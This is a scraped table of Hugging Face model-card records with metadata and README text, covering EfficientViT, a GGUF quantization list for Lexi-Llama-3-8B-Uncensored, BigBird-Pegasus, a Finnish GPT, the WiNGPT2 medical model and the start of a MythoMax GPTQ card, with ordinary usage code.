positive_prompts:
- "reason"
- "math"
- "mathematics"
- "solve"
- "count"
```
## 🌳 Model Family Tree

## 💻 Usage
```python
!pip install -qU transformers bitsandbytes accelerate
from transformers import AutoTokenizer
import transformers
import torch
model = "mlabonne/Beyonder-4x7B-v3"
tokenizer = AutoTokenizer.from_pretrained(model)
pipeline = transformers.pipeline(
"text-generation",
model=model,
model_kwargs={"torch_dtype": torch.float16, "load_in_4bit": True},
)
messages = [{"role": "user", "content": "Explain what a Mixture of Experts is in less than 100 words."}]
prompt = pipeline.tokenizer.apply_chat_template(messages, tokenize=False, add_generation_prompt=True)
outputs = pipeline(prompt, max_new_tokens=256, do_sample=True, temperature=0.7, top_k=50, top_p=0.95)
print(outputs[0]["generated_text"])
```
Output:
> A Mixture of Experts (MoE) is a neural network architecture that tackles complex tasks by dividing them into simpler subtasks, delegating each to specialized expert modules. These experts learn to independently handle specific problem aspects. The MoE structure combines their outputs, leveraging their expertise for improved overall performance. This approach promotes modularity, adaptability, and scalability, allowing for better generalization in various applications. |
timm/efficientvit_b0.r224_in1k | timm | "2023-11-21T21:43:41Z" | 3,614 | 2 | timm | [
"timm",
"pytorch",
"safetensors",
"image-classification",
"dataset:imagenet-1k",
"arxiv:2205.14756",
"license:apache-2.0",
"region:us"
] | image-classification | "2023-08-18T22:44:10Z" | ---
tags:
- image-classification
- timm
library_name: timm
license: apache-2.0
datasets:
- imagenet-1k
---
# Model card for efficientvit_b0.r224_in1k
An EfficientViT (MIT) image classification model. Trained on ImageNet-1k by paper authors.
## Model Details
- **Model Type:** Image classification / feature backbone
- **Model Stats:**
- Params (M): 3.4
- GMACs: 0.1
- Activations (M): 2.9
- Image size: 224 x 224
- **Papers:**
- EfficientViT: Multi-Scale Linear Attention for High-Resolution Dense Prediction: https://arxiv.org/abs/2205.14756
- **Original:** https://github.com/mit-han-lab/efficientvit
- **Dataset:** ImageNet-1k
## Model Usage
### Image Classification
```python
from urllib.request import urlopen
from PIL import Image
import timm
img = Image.open(urlopen(
'https://huggingface.co/datasets/huggingface/documentation-images/resolve/main/beignets-task-guide.png'
))
model = timm.create_model('efficientvit_b0.r224_in1k', pretrained=True)
model = model.eval()
# get model specific transforms (normalization, resize)
data_config = timm.data.resolve_model_data_config(model)
transforms = timm.data.create_transform(**data_config, is_training=False)
output = model(transforms(img).unsqueeze(0)) # unsqueeze single image into batch of 1
top5_probabilities, top5_class_indices = torch.topk(output.softmax(dim=1) * 100, k=5)
```
### Feature Map Extraction
```python
from urllib.request import urlopen
from PIL import Image
import timm
img = Image.open(urlopen(
'https://huggingface.co/datasets/huggingface/documentation-images/resolve/main/beignets-task-guide.png'
))
model = timm.create_model(
'efficientvit_b0.r224_in1k',
pretrained=True,
features_only=True,
)
model = model.eval()
# get model specific transforms (normalization, resize)
data_config = timm.data.resolve_model_data_config(model)
transforms = timm.data.create_transform(**data_config, is_training=False)
output = model(transforms(img).unsqueeze(0)) # unsqueeze single image into batch of 1
for o in output:
# print shape of each feature map in output
# e.g.:
# torch.Size([1, 16, 56, 56])
# torch.Size([1, 32, 28, 28])
# torch.Size([1, 64, 14, 14])
# torch.Size([1, 128, 7, 7])
print(o.shape)
```
### Image Embeddings
```python
from urllib.request import urlopen
from PIL import Image
import timm
img = Image.open(urlopen(
'https://huggingface.co/datasets/huggingface/documentation-images/resolve/main/beignets-task-guide.png'
))
model = timm.create_model(
'efficientvit_b0.r224_in1k',
pretrained=True,
num_classes=0, # remove classifier nn.Linear
)
model = model.eval()
# get model specific transforms (normalization, resize)
data_config = timm.data.resolve_model_data_config(model)
transforms = timm.data.create_transform(**data_config, is_training=False)
output = model(transforms(img).unsqueeze(0)) # output is (batch_size, num_features) shaped tensor
# or equivalently (without needing to set num_classes=0)
output = model.forward_features(transforms(img).unsqueeze(0))
# output is unpooled, a (1, 128, 7, 7) shaped tensor
output = model.forward_head(output, pre_logits=True)
# output is a (1, num_features) shaped tensor
```
## Citation
```bibtex
@article{cai2022efficientvit,
title={EfficientViT: Enhanced linear attention for high-resolution low-computation visual recognition},
author={Cai, Han and Gan, Chuang and Han, Song},
journal={arXiv preprint arXiv:2205.14756},
year={2022}
}
```
|
bartowski/Lexi-Llama-3-8B-Uncensored-GGUF | bartowski | "2024-04-24T04:14:19Z" | 3,613 | 19 | null | [
"gguf",
"uncensored",
"llama3",
"instruct",
"open",
"text-generation",
"license:llama3",
"region:us"
] | text-generation | "2024-04-24T03:51:21Z" | ---
license: llama3
tags:
- uncensored
- llama3
- instruct
- open
quantized_by: bartowski
pipeline_tag: text-generation
---
## Llamacpp imatrix Quantizations of Lexi-Llama-3-8B-Uncensored
Using <a href="https://github.com/ggerganov/llama.cpp/">llama.cpp</a> release <a href="https://github.com/ggerganov/llama.cpp/releases/tag/b2714">b2714</a> for quantization.
Original model: https://huggingface.co/Orenguteng/Lexi-Llama-3-8B-Uncensored
All quants made using imatrix option with dataset provided by Kalomaze [here](https://github.com/ggerganov/llama.cpp/discussions/5263#discussioncomment-8395384)
## Prompt format
```
<|begin_of_text|><|start_header_id|>system<|end_header_id|>
{system_prompt}<|eot_id|><|start_header_id|>user<|end_header_id|>
{prompt}<|eot_id|><|start_header_id|>assistant<|end_header_id|>
```
## Download a file (not the whole branch) from below:
| Filename | Quant type | File Size | Description |
| -------- | ---------- | --------- | ----------- |
| [Lexi-Llama-3-8B-Uncensored-Q8_0.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-Q8_0.gguf) | Q8_0 | 8.54GB | Extremely high quality, generally unneeded but max available quant. |
| [Lexi-Llama-3-8B-Uncensored-Q6_K.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-Q6_K.gguf) | Q6_K | 6.59GB | Very high quality, near perfect, *recommended*. |
| [Lexi-Llama-3-8B-Uncensored-Q5_K_M.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-Q5_K_M.gguf) | Q5_K_M | 5.73GB | High quality, *recommended*. |
| [Lexi-Llama-3-8B-Uncensored-Q5_K_S.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-Q5_K_S.gguf) | Q5_K_S | 5.59GB | High quality, *recommended*. |
| [Lexi-Llama-3-8B-Uncensored-Q4_K_M.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-Q4_K_M.gguf) | Q4_K_M | 4.92GB | Good quality, uses about 4.83 bits per weight, *recommended*. |
| [Lexi-Llama-3-8B-Uncensored-Q4_K_S.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-Q4_K_S.gguf) | Q4_K_S | 4.69GB | Slightly lower quality with more space savings, *recommended*. |
| [Lexi-Llama-3-8B-Uncensored-IQ4_NL.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-IQ4_NL.gguf) | IQ4_NL | 4.67GB | Decent quality, slightly smaller than Q4_K_S with similar performance *recommended*. |
| [Lexi-Llama-3-8B-Uncensored-IQ4_XS.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-IQ4_XS.gguf) | IQ4_XS | 4.44GB | Decent quality, smaller than Q4_K_S with similar performance, *recommended*. |
| [Lexi-Llama-3-8B-Uncensored-Q3_K_L.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-Q3_K_L.gguf) | Q3_K_L | 4.32GB | Lower quality but usable, good for low RAM availability. |
| [Lexi-Llama-3-8B-Uncensored-Q3_K_M.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-Q3_K_M.gguf) | Q3_K_M | 4.01GB | Even lower quality. |
| [Lexi-Llama-3-8B-Uncensored-IQ3_M.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-IQ3_M.gguf) | IQ3_M | 3.78GB | Medium-low quality, new method with decent performance comparable to Q3_K_M. |
| [Lexi-Llama-3-8B-Uncensored-IQ3_S.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-IQ3_S.gguf) | IQ3_S | 3.68GB | Lower quality, new method with decent performance, recommended over Q3_K_S quant, same size with better performance. |
| [Lexi-Llama-3-8B-Uncensored-Q3_K_S.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-Q3_K_S.gguf) | Q3_K_S | 3.66GB | Low quality, not recommended. |
| [Lexi-Llama-3-8B-Uncensored-IQ3_XS.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-IQ3_XS.gguf) | IQ3_XS | 3.51GB | Lower quality, new method with decent performance, slightly better than Q3_K_S. |
| [Lexi-Llama-3-8B-Uncensored-IQ3_XXS.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-IQ3_XXS.gguf) | IQ3_XXS | 3.27GB | Lower quality, new method with decent performance, comparable to Q3 quants. |
| [Lexi-Llama-3-8B-Uncensored-Q2_K.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-Q2_K.gguf) | Q2_K | 3.17GB | Very low quality but surprisingly usable. |
| [Lexi-Llama-3-8B-Uncensored-IQ2_M.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-IQ2_M.gguf) | IQ2_M | 2.94GB | Very low quality, uses SOTA techniques to also be surprisingly usable. |
| [Lexi-Llama-3-8B-Uncensored-IQ2_S.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-IQ2_S.gguf) | IQ2_S | 2.75GB | Very low quality, uses SOTA techniques to be usable. |
| [Lexi-Llama-3-8B-Uncensored-IQ2_XS.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-IQ2_XS.gguf) | IQ2_XS | 2.60GB | Very low quality, uses SOTA techniques to be usable. |
| [Lexi-Llama-3-8B-Uncensored-IQ2_XXS.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-IQ2_XXS.gguf) | IQ2_XXS | 2.39GB | Lower quality, uses SOTA techniques to be usable. |
| [Lexi-Llama-3-8B-Uncensored-IQ1_M.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-IQ1_M.gguf) | IQ1_M | 2.16GB | Extremely low quality, *not* recommended. |
| [Lexi-Llama-3-8B-Uncensored-IQ1_S.gguf](https://huggingface.co/bartowski/Lexi-Llama-3-8B-Uncensored-GGUF/blob/main/Lexi-Llama-3-8B-Uncensored-IQ1_S.gguf) | IQ1_S | 2.01GB | Extremely low quality, *not* recommended. |
## Which file should I choose?
A great write up with charts showing various performances is provided by Artefact2 [here](https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9)
The first thing to figure out is how big a model you can run. To do this, you'll need to figure out how much RAM and/or VRAM you have.
If you want your model running as FAST as possible, you'll want to fit the whole thing on your GPU's VRAM. Aim for a quant with a file size 1-2GB smaller than your GPU's total VRAM.
If you want the absolute maximum quality, add both your system RAM and your GPU's VRAM together, then similarly grab a quant with a file size 1-2GB Smaller than that total.
Next, you'll need to decide if you want to use an 'I-quant' or a 'K-quant'.
If you don't want to think too much, grab one of the K-quants. These are in format 'QX_K_X', like Q5_K_M.
If you want to get more into the weeds, you can check out this extremely useful feature chart:
[llama.cpp feature matrix](https://github.com/ggerganov/llama.cpp/wiki/Feature-matrix)
But basically, if you're aiming for below Q4, and you're running cuBLAS (Nvidia) or rocBLAS (AMD), you should look towards the I-quants. These are in format IQX_X, like IQ3_M. These are newer and offer better performance for their size.
These I-quants can also be used on CPU and Apple Metal, but will be slower than their K-quant equivalent, so speed vs performance is a tradeoff you'll have to decide.
The I-quants are *not* compatible with Vulcan, which is also AMD, so if you have an AMD card double check if you're using the rocBLAS build or the Vulcan build. At the time of writing this, LM Studio has a preview with ROCm support, and other inference engines have specific builds for ROCm.
Want to support my work? Visit my ko-fi page here: https://ko-fi.com/bartowski
|
google/bigbird-pegasus-large-bigpatent | google | "2023-01-24T16:36:44Z" | 3,611 | 35 | transformers | [
"transformers",
"pytorch",
"bigbird_pegasus",
"text2text-generation",
"summarization",
"en",
"dataset:big_patent",
"arxiv:2007.14062",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | summarization | "2022-03-02T23:29:05Z" | ---
language: en
license: apache-2.0
datasets:
- big_patent
tags:
- summarization
---
# BigBirdPegasus model (large)
BigBird, is a sparse-attention based transformer which extends Transformer based models, such as BERT to much longer sequences. Moreover, BigBird comes along with a theoretical understanding of the capabilities of a complete transformer that the sparse model can handle.
BigBird was introduced in this [paper](https://arxiv.org/abs/2007.14062) and first released in this [repository](https://github.com/google-research/bigbird).
Disclaimer: The team releasing BigBird did not write a model card for this model so this model card has been written by the Hugging Face team.
## Model description
BigBird relies on **block sparse attention** instead of normal attention (i.e. BERT's attention) and can handle sequences up to a length of 4096 at a much lower compute cost compared to BERT. It has achieved SOTA on various tasks involving very long sequences such as long documents summarization, question-answering with long contexts.
## How to use
Here is how to use this model to get the features of a given text in PyTorch:
```python
from transformers import BigBirdPegasusForConditionalGeneration, AutoTokenizer
tokenizer = AutoTokenizer.from_pretrained("google/bigbird-pegasus-large-bigpatent")
# by default encoder-attention is `block_sparse` with num_random_blocks=3, block_size=64
model = BigBirdPegasusForConditionalGeneration.from_pretrained("google/bigbird-pegasus-large-bigpatent")
# decoder attention type can't be changed & will be "original_full"
# you can change `attention_type` (encoder only) to full attention like this:
model = BigBirdPegasusForConditionalGeneration.from_pretrained("google/bigbird-pegasus-large-bigpatent", attention_type="original_full")
# you can change `block_size` & `num_random_blocks` like this:
model = BigBirdPegasusForConditionalGeneration.from_pretrained("google/bigbird-pegasus-large-bigpatent", block_size=16, num_random_blocks=2)
text = "Replace me by any text you'd like."
inputs = tokenizer(text, return_tensors='pt')
prediction = model.generate(**inputs)
prediction = tokenizer.batch_decode(prediction)
```
## Training Procedure
This checkpoint is obtained after fine-tuning `BigBirdPegasusForConditionalGeneration` for **summarization** on [big_patent](https://huggingface.co/datasets/big_patent) dataset.
## BibTeX entry and citation info
```tex
@misc{zaheer2021big,
title={Big Bird: Transformers for Longer Sequences},
author={Manzil Zaheer and Guru Guruganesh and Avinava Dubey and Joshua Ainslie and Chris Alberti and Santiago Ontanon and Philip Pham and Anirudh Ravula and Qifan Wang and Li Yang and Amr Ahmed},
year={2021},
eprint={2007.14062},
archivePrefix={arXiv},
primaryClass={cs.LG}
}
```
|
TurkuNLP/gpt3-finnish-small | TurkuNLP | "2023-06-27T06:48:35Z" | 3,610 | 10 | transformers | [
"transformers",
"pytorch",
"bloom",
"feature-extraction",
"text-generation",
"fi",
"arxiv:2203.02155",
"license:apache-2.0",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | text-generation | "2023-02-15T10:08:16Z" | ---
language:
- fi
pipeline_tag: text-generation
license: apache-2.0
---
Generative Pretrained Transformer with 186M parameteres for Finnish.
TurkuNLP Finnish GPT-3-models are a model family of pretrained monolingual GPT-style language models that are based on BLOOM-architecture.
Note that the models are pure language models, meaning that they are not [instruction finetuned](https://arxiv.org/abs/2203.02155) for dialogue
or answering questions.
These models are intended to be used as foundational models that can be e.g. instruction finetuned to serve as modern chat-models.
All models are trained for 300B tokens.
**Parameters**
| Model | Layers | Dim | Heads | Params |
|--------|--------|------|-------|--------|
| Small | 12 | 768 | 12 | 186M |
| Medium | 24 | 1024 | 16 | 437M |
| Large | 24 | 1536 | 16 | 881M |
| XL | 24 | 2064 | 24 | 1.5B |
| ”3B” | 32 | 2560 | 32 | 2.8B |
| ”8B” | 32 | 4096 | 32 | 7.5B |
| "13B" | 40 | 5120 | 40 | 13.3B |
**Datasets**
We used a combination of multiple Finnish resources.
* Finnish Internet Parsebank https://turkunlp.org/finnish_nlp.html
mC4 multilingual colossal, cleaned Common Crawl https://huggingface.co/datasets/mc4
* Common Crawl Finnish https://TODO
* Finnish Wikipedia https://fi.wikipedia.org/wiki
* Lönnrot Projekti Lönnrot http://www.lonnrot.net/
* ePub National library ”epub” collection
* National library ”lehdet” collection
* Suomi24 The Suomi 24 Corpus 2001-2020 http://urn.fi/urn:nbn:fi:lb-2021101527
* Reddit r/Suomi submissions and comments https://www.reddit.com/r/Suomi
* STT Finnish News Agency Archive 1992-2018 http://urn.fi/urn:nbn:fi:lb-2019041501
* Yle Finnish News Archive 2011-2018 http://urn.fi/urn:nbn:fi:lb-2017070501
* Yle Finnish News Archive 2019-2020 http://urn.fi/urn:nbn:fi:lb-2021050401
* Yle News Archive Easy-to-read Finnish 2011-2018 http://urn.fi/urn:nbn:fi:lb-2019050901
* Yle News Archive Easy-to-read Finnish 2019-2020 http://urn.fi/urn:nbn:fi:lb-2021050701
* ROOTS TODO
**Sampling ratios**
|Dataset | Chars | Ratio | Weight | W.Ratio |
|----------|--------|---------|--------|---------|
|Parsebank | 35.0B | 16.9\% | 1.5 | 22.7\%|
|mC4-Fi | 46.3B | 22.4\% | 1.0 | 20.0\%|
|CC-Fi | 79.6B | 38.5\% | 1.0 | 34.4\%|
|Fiwiki | 0.8B | 0.4\% | 3.0 | 1.0\%|
|Lönnrot | 0.8B | 0.4\% | 3.0 | 1.0\%|
|Yle | 1.6B | 0.8\% | 2.0 | 1.4\%|
|STT | 2.2B | 1.1\% | 2.0 | 1.9\%|
|ePub | 13.5B | 6.5\% | 1.0 | 5.8\%|
|Lehdet | 5.8B | 2.8\% | 1.0 | 2.5\%|
|Suomi24 | 20.6B | 9.9\% | 1.0 | 8.9\%|
|Reddit-Fi | 0.7B | 0.4\% | 1.0 | 0.3\%|
|**TOTAL** | **207.0B** | **100.0\%** | **N/A** | **100.0\%** |
More documentation and a paper coming soon. |
winninghealth/WiNGPT2-Llama-3-8B-Base | winninghealth | "2024-04-25T05:48:01Z" | 3,610 | 4 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"medical",
"en",
"zh",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | text-generation | "2024-04-23T05:37:50Z" | ---
language:
- en
- zh
tags:
- medical
license: apache-2.0
---
## WiNGPT2
[WiNGPT](https://github.com/winninghealth/WiNGPT2) 是一个基于GPT的医疗垂直领域大模型,旨在将专业的医学知识、医疗信息、数据融会贯通,为医疗行业提供智能化的医疗问答、诊断支持和医学知识等信息服务,提高诊疗效率和医疗服务质量。
## 更新日志
[2024/04/23] 更新 WiNGPT2-Llama-3-8B-Base 模型(中文增强/多语言)与测评结果
[2024/04/01] 更新 WiNEval 测评结果
[2024/03/05] 开源7B/14B-Chat-4bit模型权重: [🤗](https://huggingface.co/winninghealth/WiNGPT2-7B-Chat-AWQ)WiNGPT2-7B-Chat-4bit和[🤗](https://huggingface.co/winninghealth/WiNGPT2-14B-Chat-AWQ)WiNGPT2-14B-Chat-4bit。
[2023/12/20] 新增用户微信群二维码,有效期到12月27日,扫码进群。
[2023/12/18] 发布卫宁健康医疗模型测评方案 WiNEval-MCKQuiz的评测结果。
[2023/12/12] 开源 WiNGPT2 14B模型权重: [🤗](https://huggingface.co/winninghealth/WiNGPT2-14B-Base)WiNGPT2-14B-Base 和 [🤗](https://huggingface.co/winninghealth/WiNGPT2-14B-Chat)WiNGPT2-14B-Chat。
[2023/11/02] [34B模型平台测试](https://wingpt.winning.com.cn/) 和 [欢迎加入微信讨论群](https://github.com/winninghealth/WiNGPT2/blob/main/assets/WiNGPT_GROUP.JPG)
[2023/10/13] 更新一个简单的[Chatbot示例](#部署),可以进行简单的多轮对话。
[2023/09/26] 开源 WiNGPT2 与7B模型权重: [🤗](https://huggingface.co/winninghealth/WiNGPT2-7B-Base)WiNGPT2-7B-Base 和 [🤗](https://huggingface.co/winninghealth/WiNGPT2-7B-Chat)WiNGPT2-7B-Chat。
## 如何使用
### 推理
```python
from transformers import AutoModelForCausalLM, AutoTokenizer
model_path = "WiNGPT-Llama-3-8B-Chat"
device = "cuda"
tokenizer = AutoTokenizer.from_pretrained(model_path)
model = AutoModelForCausalLM.from_pretrained(model_path).to(device)
model = model.eval()
text = 'User:WiNGPT, 你好<|end_of_text|>\n Assistant:'
inputs = tokenizer.encode(text, return_tensors="pt").to(device)
outputs = model.generate(inputs, repetition_penalty=1.1, max_new_tokens=1024)
response = tokenizer.decode(outputs[0])
print(response)
## 输出结果:你好!今天我能为你做些什么?<|end_of_text|>
```
### 提示
WiNGPT-Llama-3-8B-Chat 使用了自定义的提示格式:
用户角色:System/User/Assistant
chat_template:
```jinja2
"{% for message in messages %}{% if message['role'] == 'system' %}System:{% endif %}{% if message['role'] == 'user' %}User:{% endif %}{% if message['role'] == 'assistant' %}Assistant:{% endif %}{{ message['content'] }}<|end_of_text|>\n {% endfor %}Assistant:"
```
**指令提示**示例:
```
User:WiNGPT, 你好<|end_of_text|>\n Assistant:
```
**多轮对话**示例:
```
User:WiNGPT, 你好<|end_of_text|>\n Assistant:你好!今天我能为你做些什么?<|end_of_text|>\n User:你是谁?<|end_of_text|>\n Assistant:
```
**翻译功能**示例:
```
System:作为医疗领域的智能助手,WiNGPT将提供中英翻译服务。用户输入的中文或英文内容将由WiNGPT进行准确的翻译,以满足用户的语言需求。<|end_of_text|>\n User:Life is short, you know, and time is so swift; Rivers are wide, so wide, and ships sail far.<|end_of_text|>\n Assistant:
```
## 模型卡
#### 训练配置与参数
| 名称 | 训练策略 | 长度 | 精度 | 学习率 | Weight_decay | Epochs | GPUs |
| ----------------------- | ------------------ | ---- | ---- | ------ | ------------ | ------ | ------ |
| WiNGPT2-Llama-3-8B-Base | 继续预训练 (20G) | 8192 | bf16 | 5e-5 | 0.05 | 2 | A100*8 |
| WiNGPT2-Llama-3-8B-Chat | 微调/对齐 (50万条) | 8192 | bf16 | 5e-6 | 0.01 | 4 | A100*8 |
#### 训练数据
预训练数据约20G,指令微调对齐数据约50万条,[详细内容](https://github.com/winninghealth/WiNGPT2?tab=readme-ov-file#%E8%AE%AD%E7%BB%83%E6%95%B0%E6%8D%AE) 。
## 中文医疗评测 - WiNEval
更新时间:2024-04-23
| | Type | MCKQuiz | MSceQA |
| ----------------------------- | ---------------------- | ----------- | ----------- |
| **WiNGPT-Llama-3-8B-Base** | Continued Pre-training | 66.3 | / |
| Meta-Llama-3-8B | Pre-training | 37 | / |
| | | | |
| **WiNGPT-Llama-3-8B-Chat** | Finetuning/Alignment | 65.2 | 79.8 |
| Meta-Llama-3-8B-Instruct | Finetuning/Alignment | 49.8 | 76.3 |
| Meta-Llama-3-70B-Instruct-AWQ | Finetuning/Alignment | 73.5 | 78.6 |
| | | | |
*MCKQuiz(客观题):17个科目分类13060选择题;输入问题和选项,让模型输出答案。根据标准答案判断对错,统计准确率。*
*MSceQA(主观题):由细分领域场景题目构成,包含八大业务场景,17个一级分类和32个二级分类。使用人工/模型对模型的回答进行准确性、相关性、一致性、完整性、权威性评价,并参照标准答案对模型生成的答案进行评分。*
[其他WiNEval评测结果](https://github.com/winninghealth/WiNGPT2?tab=readme-ov-file#2-%E5%8D%AB%E5%AE%81%E5%81%A5%E5%BA%B7%E5%8C%BB%E7%96%97%E6%A8%A1%E5%9E%8B%E6%B5%8B%E8%AF%84%E6%96%B9%E6%A1%88-winevalzero-shot)
### 企业服务
[通过WiNGPT测试平台申请密钥或与我们取得联系](https://wingpt.winning.com.cn/)
## 局限性与免责声明
(a) WiNGPT2 是一个专业医疗领域的大语言模型,可为一般用户提供拟人化AI医生问诊和问答功能,以及一般医学领域的知识问答。对于专业医疗人士,WiNGPT2 提供关于患者病情的诊断、用药和健康建议等方面的回答的建议仅供参考。
(b) 您应理解 WiNGPT2 仅提供信息和建议,不能替代医疗专业人士的意见、诊断或治疗建议。在使用 WiNGPT2 的信息之前,请寻求医生或其他医疗专业人员的建议,并独立评估所提供的信息。
(c) WiNGPT2 的信息可能存在错误或不准确。卫宁健康不对 WiNGPT2 的准确性、可靠性、完整性、质量、安全性、及时性、性能或适用性提供任何明示或暗示的保证。使用 WiNGPT2 所产生的结果和决策由您自行承担。第三方原因而给您造成的损害结果承担责任。
## 许可证
1. 本项目授权协议为 Apache License 2.0,模型权重需要遵守基础模型 [Llama-3-8B](https://github.com/meta-llama/llama3) 相关协议及其[许可证](https://llama.meta.com/llama3/license),详细内容参照其网站。
2. 使用本项目包括模型权重时请引用本项目:https://github.com/winninghealth/WiNGPT2
## 联系我们
网站:https://www.winning.com.cn
邮箱:[email protected] |
hoschidude/sqlcoder-70-alpha-q4_k_m.gguf | hoschidude | "2024-06-20T09:22:10Z" | 3,610 | 1 | null | [
"gguf",
"region:us"
] | null | "2024-06-20T07:34:49Z" | Entry not found |
TheBloke/MythoMax-L2-13B-GPTQ | TheBloke | "2023-09-27T12:45:40Z" | 3,609 | 166 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"en",
"base_model:Gryphe/MythoMax-L2-13b",
"license:other",
"autotrain_compatible",
"text-generation-inference",
"4-bit",
"gptq",
"region:us"
] | text-generation | "2023-08-11T07:27:24Z" | ---
language:
- en
license: other
model_name: MythoMax L2 13B
base_model: Gryphe/MythoMax-L2-13b
inference: false
model_creator: Gryphe
model_type: llama
prompt_template: '```
{system_message}
### Instruction:
{prompt}
(For roleplay purposes, I suggest the following - Write <CHAR NAME>''s next reply
in a chat between <YOUR NAME> and <CHAR NAME>. Write a single reply only.)
### Response:
```
'
quantized_by: TheBloke
---
<!-- header start -->
<!-- 200823 -->
<div style="width: auto; margin-left: auto; margin-right: auto">
<img src="https://i.imgur.com/EBdldam.jpg" alt="TheBlokeAI" style="width: 100%; min-width: 400px; display: block; margin: auto;">
</div>
<div style="display: flex; justify-content: space-between; width: 100%;">
<div style="display: flex; flex-direction: column; align-items: flex-start;">
<p style="margin-top: 0.5em; margin-bottom: 0em;"><a href="https://discord.gg/theblokeai">Chat & support: TheBloke's Discord server</a></p>
</div>
<div style="display: flex; flex-direction: column; align-items: flex-end;">
<p style="margin-top: 0.5em; margin-bottom: 0em;"><a href="https://www.patreon.com/TheBlokeAI">Want to contribute? TheBloke's Patreon page</a></p>
</div>
</div>
<div style="text-align:center; margin-top: 0em; margin-bottom: 0em"><p style="margin-top: 0.25em; margin-bottom: 0em;">TheBloke's LLM work is generously supported by a grant from <a href="https://a16z.com">andreessen horowitz (a16z)</a></p></div>
<hr style="margin-top: 1.0em; margin-bottom: 1.0em;">
<!-- header end -->
# MythoMax L2 13B - GPTQ
- Model creator: [Gryphe](https://huggingface.co/Gryphe)
- Original model: [MythoMax L2 13B](https://huggingface.co/Gryphe/MythoMax-L2-13b)
<!-- description start -->
## Description
This repo contains GPTQ model files for [Gryphe's MythoMax L2 13B](https://huggingface.co/Gryphe/MythoMax-L2-13b).
Multiple GPTQ parameter permutations are provided; see Provided Files below for details of the options provided, their parameters, and the software used to create them.
<!-- description end -->
<!-- repositories-available start -->
## Repositories available
* [AWQ model(s) for GPU inference.](https://huggingface.co/TheBloke/MythoMax-L2-13B-AWQ)
* [GPTQ models for GPU inference, with multiple quantisation parameter options.](https://huggingface.co/TheBloke/MythoMax-L2-13B-GPTQ)
* [2, 3, 4, 5, 6 and 8-bit GGUF models for CPU+GPU inference](https://huggingface.co/TheBloke/MythoMax-L2-13B-GGUF)
* [Gryphe's original unquantised fp16 model in pytorch format, for GPU inference and for further conversions](https://huggingface.co/Gryphe/MythoMax-L2-13b)
<!-- repositories-available end -->
<!-- prompt-template start -->
## Prompt template: Custom
```
{system_message}
### Instruction:
{prompt}
(For roleplay purposes, I suggest the following - Write <CHAR NAME>'s next reply in a chat between <YOUR NAME> and <CHAR NAME>. Write a single reply only.)
### Response:
```
<!-- prompt-template end -->
<!-- licensing start -->
## Licensing
The creator of the source model has listed its license as `other`, and this quantization has therefore used that same license.
As this model is based on Llama 2, it is also subject to the Meta Llama 2 license terms, and the license files for that are additionally included. It should therefore be considered as being claimed to be licensed under both licenses. I contacted Hugging Face for clarification on dual licensing but they do not yet have an official position. Should this change, or should Meta provide any feedback on this situation, I will update this section accordingly.
In the meantime, any questions regarding licensing, and in particular how these two licenses might interact, should be directed to the original model repository: [Gryphe's MythoMax L2 13B](https://huggingface.co/Gryphe/MythoMax-L2-13b).
<!-- licensing end -->
<!-- README_GPTQ.md-provided-files start -->
## Provided files and GPTQ parameters
Multiple quantisation parameters are provided, to allow you to choose the best one for your hardware and requirements.
Each separate quant is in a different branch. See below for instructions on fetching from different branches.
All recent GPTQ files are made with AutoGPTQ, and all files in non-main branches are made with AutoGPTQ. Files in the `main` branch which were uploaded before August 2023 were made with GPTQ-for-LLaMa.
<details>
